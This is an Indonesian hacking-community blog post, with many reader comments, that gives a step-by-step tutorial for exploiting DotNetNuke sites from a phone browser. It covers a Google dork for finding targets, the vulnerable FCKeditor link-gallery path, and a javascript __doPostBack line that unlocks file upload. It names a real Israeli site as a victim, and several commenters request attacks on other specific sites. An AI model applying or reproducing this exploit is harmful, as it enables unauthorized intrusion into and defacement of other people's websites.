Binus Hacker - Independent Hacking Community   Subscribe to BINUS HACKER Subscribe to BINUS HACKERSubscribe to BINUS HACKER FacebookSubscribe to BINUS HACKER Twitter

Hacking Website Melalui Handphone

20 September 2011
Penulis:   · Kategori Artikel: Hacking

BINUS HACKER Binus Hacker Is Not Criminal Banner





Hack Website Lewat HP

Mungkin kedengarannya gila bila membaca judul diatas….! ‘it’s imposible‘  kata beberapa orang, Saya hanya seorang Newbie yg selalu pgn mencoba, maaf bila postingan ini dah basi dan untuk para master jangan dibaca ya coz dah jadul.

Pada dasarnya aplikasi web browser di HP maupun di PC it cara kerjanya sama,yg membedakan adalah system yg bekerja mendukung applikasi it sendiri (Java, SymBian, Linux, Windows, Android etc). Dan ukuran atau kapasitas serta kemampuan menampilkan web. Tapi pada dasarnya cara kerjanya tetap. Sama, jadi apa yg bisa dilakukan lwt pc,kmgknan bsa jg dikerjakan lwt hape…!

Nah yg coba saya bahas disini adalah exploit web dgn cara hack web melalui DNN (dot net nuke) exploit
melalui hape.

Bahan2 yg kita butuhkan adalah:

1. Operamini browser versi 5.0
2. Operamini browser versi 4.2

Kenapa pake 2 Web Browser ?

Lebih enak pake 2 browser di atas.alasannya adalah:

1. Operamini 5.0 mendukung multi tab jadi cocok buat mencari target dan mengetesnya   tanpa harus open close satu2.

2. Operamini 5.0 mempunyai kemampuan copi paste,pilih text dan lgsg mensearchnya dlm sekali klik ditab yg sama ataupun membukanya di tab baru.

3. Operamini 4.2 respon browser lbh bagus dr yg v 5.0

Setelah cek target dr opmin 5.0 dan ternyata vuln tgl copy kan aja linknya di operamini 4.2 .
Tgl kta exploit lwt situ..
(Operamini 4.2 tdk multi tab,untuk yg multi tab slhkan cari di opera modif di google)

Nah sekarang memasuki langkah2 atau cara2 melakukan hack web dgn DNN exploit melalui opera mini.

Pertama: pastikan anda masih mempunyai saldo pulsa
Kedua: buka operamini v 5.0 anda dan ketik di kolom google search dorknya->

inurl:”/portals/0″  

And search!!…
Nah dapet kan??
Tinggal kita pilh target yang pas di hati.dan kali ini saya coba di situs orang israel.
Taruh cursor di link target trus tekan angka 1 di keypad hape anda.
Pilih open in new tab.
Begitu seterusnya untuk link target yg lain sampai keluar beberapa tab.
Oh,ya untuk mengetahu gimana ,apa dan bagaimana DNN exploit it silahkan baca disini:

http://securityreason.com/exploitalert/6234

Next, misalkan kita dah dpt targetnya nih…

Example site:
http://fril.co.il/portals/0/cwindex.txt

Spti keterangan di securityreason di atas kita coba potong link target dan menggantinya dgn
/Providers/HtmlEditorProviders/ Fck/fcklinkgallery.aspx  

->http://site.com/[path]/portals/0/a.txt

Menjadi
->http://site.com/[path]/Providers/HtmlEditorProviders/ Fck/fcklinkgallery.aspx  

Lakukan it pada smua target yg udah kamu buka pada browser operamini 5.0 km.biar gak bolak balik
copas lagi.

Setelah dapet dan pasti vuln seperti site di bawah ini.

http://fril.co.il//Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Copy dan pastekan di opera 4.2 kamu.
Nb:Alasannya knapa pindah browser yaitu pada opera 5.0 di hape saya kurang respon pada perintahupload. Proses upload berjalan tapi file tidak terupload dan begitu di coba di v 4.2 sukses terupload. Tapi bila di v.5.0 km bisa ya lanjut aja disitu.gak ush pndah applikasi.
Lanjut proses.!

Setelah site target di buka di opmin 4.2

Pilih : file ( select a file on your site)

Tunggu biar loading selesai dan menampilkan 2 kolom:

Kolom 1 biasanya tulisan ‘root’
Kolom 2 berisi macam2 file.
Setelah loading selesai hapus link di addres bar operamini kamu dan ganti dgn script di bawah ini:
javascript:__doPostBack(‘ctlURL $cmdUpload’,”)

Lalu klik ok….

Kolom yg tdnya berisi ‘root’ dan ‘jenis2 file’
Skrg ganti menjadi kolom ‘root’ dan kolom kosong untuk upload file.
Nah skrg tgl km upload tuh file txt yg udah km simpan di hape km.
SUCCESS..! you cAn hacked a web site from mobile phone.

Hasilnya seperti ini http://fril.co.il/portals/0/xadal.txt < 100% lewat handphone

Nb: angka 1 di operamini berfungsi untuk copas,select text and open new tab.
-sekian-

Posted by Grey | Shinji Kagawa

Thx to all my friends
BinusHacker | wannabe hacker team| kill-9 |indonesianCoder
Visit my forum and blog.

http://www.3tnic.co.nr

BINUS HACKER Binus Hacker Chat and Forum

Komentar

62 Komentar Untuk “Hacking Website Melalui Handphone
Silahkan Berikan Tanggapan Anda Untuk Artikel Ini...

  1. c3nd0lp1r4t3 pada 20 September 2011 7:44 pm

    gud job bray. (y)

  2. Hacking Website Melalui Handphone | Hacking and Hacker pada 20 September 2011 9:47 pm

    [...] Hacking Website Melalui Handphone Hack Posted in: Hacking, Handphone, Melalui, Website — Hack Website Lewat HP Mungkin kedengarannya gila bila membaca judul diatas….! ‘it’s imposible‘  kata beberapa orang, Saya hanya seorang Newbie yg selalu pgn mencoba, maaf bila postingan ini dah basi dan untuk para master jangan dibaca ya coz dah jadul. Pada dasarnya aplikasi web browser di HP maupun di PC it cara kerjanya sama,yg membedakan [...] BINUS HACKER [...]

  3. Hacking Website Melalui Handphone | Sitemaps.tk pada 20 September 2011 11:46 pm

    [...] Hack Website Lewat HP Mungkin kedengarannya gila bila membaca judul diatas….! ‘it’s imposible‘  kata beberapa orang, Saya hanya seorang Newbie yg selalu pgn mencoba, maaf bila postingan ini dah basi dan untuk para master jangan dibaca ya coz dah jadul. Pada dasarnya aplikasi web browser di HP maupun di PC it cara kerjanya sama,yg membedakan [...] BINUS HACKER [...]

  4. LH pada 21 September 2011 5:10 am

    agan-agan yang komentar d bwh sya kunjngi blog saya tentang cheat pb terbaru, cheat game fb dll

  5. fajar pada 22 September 2011 6:44 am

    kata2nya membingunkan gan,

  6. vend3r pada 30 September 2011 3:24 am

    hrs handphone yg mahalan nie

  7. 3l33t3 h4ck3r pada 2 October 2011 4:22 am

    Nice share bro.. but with very high risk. Believe Me! you will be trace easily because you can’t hide your IP Address

  8. thealam pada 3 October 2011 3:00 am

    wih,, jujur Mastah, ane lebih suka BELAJAR hack web pake hape ketimbang PC :-D. ya mungkin hp agak familiar buat ane :-D

  9. datoxnet pada 3 October 2011 8:42 pm

    buat yg berkant0ng tipis ky ane,emang opmin lebh cucok bro.dan ngenetnya pke gret0ngan pula…..

  10. dikaqq pada 12 October 2011 4:36 am

    yang bisa ngeheck, tolong heck ni website indonesia.faithfreedom.org
    terutama buat hacker muslim

  11. yupi pada 13 October 2011 10:34 am

    ane coba di Nokia 6600 meski lama tapi sukses gan gkggkgkgkgk

    thanks gan..

  12. gabin pada 16 October 2011 8:45 pm

    wow….!!! lumayan lah buat iseng-iseng..!!!

  13. Inuuard pada 17 October 2011 10:11 am

    contoh site yang di hack itu..permanen ato gak?? (pengen tahu)

    Trimsss..

  14. oncom goreng pada 18 October 2011 6:27 am

    wowwwww. . .
    muantabeee’sssssss

  15. Cungkring pada 28 October 2011 5:46 pm

    gue minta artikul binus untuk di hosting di blog gue…. thank

  16. alengka pada 6 November 2011 7:43 pm

    henpong 3315 koq ga bisa yah..
    Nice share..ane udah coba,ternyata.,..berhasil biar pun tadi nya gagal terus.

  17. bang ONE pada 8 November 2011 3:35 am

    mantap lah agan” yang baik hati atas infonya……….bkal gue praktekin ni…mg berhasil ya…

  18. hitamputih pada 15 November 2011 4:41 pm

    weew :D OKE JUGA nih ,ngeliat judul nya bikin kaget sob hack wapsite via hp,tapi bagus sob artikelnya menarik hehe.. ..sukses

  19. Hacking Learning pada 17 November 2011 6:33 pm

    visit my blog .
    Free ebooks, tutorial hacking/cracking, n cheat game online (fb, pb)

  20. shem al abe pada 26 November 2011 5:26 am

    seep

  21. daud ifadah pada 2 December 2011 11:10 pm

    NICE SHARE!!

    SEMANGAT!!!!!!

  22. jafrie pada 16 December 2011 8:51 am

    siiip

  23. Bx3 pada 19 December 2011 4:24 pm

    Keren kk+cukup gila
    Tp bisa

  24. Bx3 pada 19 December 2011 4:25 pm

    oww y bisa request posting “Cara nyebarin virus lewat web site sendiri g ?”

  25. arie pada 20 December 2011 6:25 pm

    good job….izin copas

  26. Acid pada 22 December 2011 5:19 am

    Gw coba ya brow..
    thanks infonya..

  27. hendry pada 27 December 2011 10:25 am

    mantab bos,,,
    flash game>> http://www.shareisfree.blogspot.com

  28. tottoque pada 30 December 2011 1:35 am

    ma kasih sebusyet2nya. Bisa emailin ane cara2 hack lain yg pake hp? ane pake n9300i. aman koq. ga bs di trace buat hajar spammer

  29. justinbieber pada 4 January 2012 7:00 am

    manteb abiz..
    mohon bntuannya y, coz q masih newbie

  30. unknown24 pada 5 January 2012 3:45 am

    Yg pke PC aja lom bisa apalagi wat hp,,, xixixi
    but thx,, nice share,,,

  31. hasan pada 8 January 2012 7:16 pm

    nice share…. :)

  32. d3x4r12h0 pada 10 January 2012 3:18 am

    nice gan, semoga semakin banyak tutorial hack dan deface menggunakan Hp hihihihihi

  33. za pada 12 January 2012 1:51 am

    haaaaaaaaaaaaaaaaaaaa

  34. NT pada 28 January 2012 1:19 am

    kembangkan sob :^_^

  35. zippien pada 30 January 2012 3:13 am

    whaaaaaaaaaaaaa… mumet dah

  36. wahyu pada 4 February 2012 10:20 am

    apa bsa facebook bsa d hack dgn cra yg diatas,…thx

  37. sandhi pada 5 February 2012 9:54 pm

    klo web game bisa enggak???

  38. farid pada 8 February 2012 5:54 pm

    Thanks berat nih….nambah ilmu ane…..

  39. adhan pada 9 February 2012 3:11 am

    bingungg,..
    diperjelas donk,..??

  40. Hacking Website Melalui Handphone | Artikulus pada 12 February 2012 6:46 pm

    [...] TweetBinushacker.net-Mungkin kedengarannya gila bila membaca judul diatas….! ‘it’s imposible‘  kata beberapa orang, Saya hanya seorang Newbie yg selalu pgn mencoba, maaf bila postingan ini dah basi dan untuk para master jangan dibaca ya coz dah jadul. [...]

  41. Artikulus pada 12 February 2012 6:49 pm

    Artikelnya bagus dan sangat bermanfaat.

  42. Artikulus pada 12 February 2012 6:51 pm

    Artikelnya bagus dan sangat bermanfaat. Izin saya share ya.

    http://artikulus.com/teknologi/hacking-website-melalui-handphone/

  43. yubi pada 12 February 2012 11:23 pm

    hay gan mau belajar dari suhu-suhu semua tetang dunia maya tapi gak tau gi mana cara nya dan sp yang mau ngajarin ya udah ane pajang no hp 089691696060 yang ngajarin gw jadi orang yang paling di hormatin

  44. Yazhuke pada 20 February 2012 5:56 pm

    Aku mau nanya.
    Address yang dijadikan target itu harus http://*.(?)/portals/0/*.(txt) < Harus ini / bisa format (html), (PdF) dll ?

    Aku udah coba trus dapat gini:
    Link Gallery
    URL:
    Use selected link

    Tapi kok gak ada kolomx. cuma ''Use Selected Link'' yg bisa di klik tp kembali seperti biasa.

    OpMin yg aku pake v6.5 < HP E63.

    Help me please !

  45. Street Hacker pada 6 March 2012 12:57 am

    sdikit kekeliruan….?

  46. Street Hacker pada 6 March 2012 1:01 am

    BINUS HACKER…..

    Tambah donk cara membuat game….
    biar indonesia cepet berprestasi….:)

  47. fundament0zz pada 11 March 2012 2:39 am

    lebih bagus lagi kalo ditambah tutorial untuk hack website dari android yang server apache

  48. Arie Nuerhansyah pada 27 June 2012 11:19 pm

    wow mantap gan Infonya
    saya izin Copas ya :)

  49. Aphe pada 19 July 2012 12:41 pm

    Mari qt Ancurin web prusahan yg menginjak2 buruh wkwk

  50. jebatmalaya pada 6 August 2012 3:54 am

    pening den… xde yg paling mudah n cepat ke?/

  51. Dark Elite Technology pada 6 August 2012 8:22 am

    wah ternyata ada juga cara hack lewat Handphone Keren

  52. Tips dan Trik Komputer pada 19 November 2012 10:36 pm

    wahh … makin mudah saja kita melakukan hacking , tutorialnya menjurus ke HP sekarang haha IPnya jga susah ke detect :D

  53. Goenx Jacob Swann pada 8 January 2013 8:06 am

    Thx, it’s work
    <》_《>

  54. RazaMage pada 14 January 2013 9:41 pm

    Ijin Copas om?

  55. dnrsdn pada 17 February 2013 7:52 pm

    Mesti txt ya ? Kalo mau hack situs lain misalnya http://www.dnrsdn.com nyari portalnya gimana ? / cara hack nya gimana ? Newbie nih

  56. ranho pada 13 June 2013 12:10 am

    Mantabp

  57. Dunia Kehidupan pada 21 August 2013 4:04 pm

    wow

  58. Iqbalmobile pada 4 November 2013 8:12 pm

    Thanks bozz

  59. Tri wija pada 8 November 2013 10:57 pm

    Hahaha saya masih bingung ,yang membingungkan adalah kata” anda ! ,hehe ,

  60. Ian maz pada 21 November 2013 1:28 pm

    Kalo cuma pake opmin v4.2 nggk bisa copas gan…

  61. fatik pada 9 January 2014 1:39 am

    kata”nya hebat bgt, gw sampe gk ngerti maksudnya
    follow twitterku ya: @fatik_jozz

  62. Ch4kzz pada 17 March 2014 5:59 am

    Aman gak ? Ada yg sdh berhasil?

  63. latif pada 27 April 2014 12:04 am

    teks to binus hacker, uji coba 100% mantap, dng tabled advan t5b
    izin jln2 gan

  64. Marck pada 6 July 2014 2:14 am

    Jgn bwa israel donk

  65. Azhary pada 12 July 2014 5:53 am

    Hehehe cuman upload txt…

  66. Andi-Cyber pada 1 August 2014 10:29 am

    CooLz Semua

Silahkan Berikan Tanggapan Anda...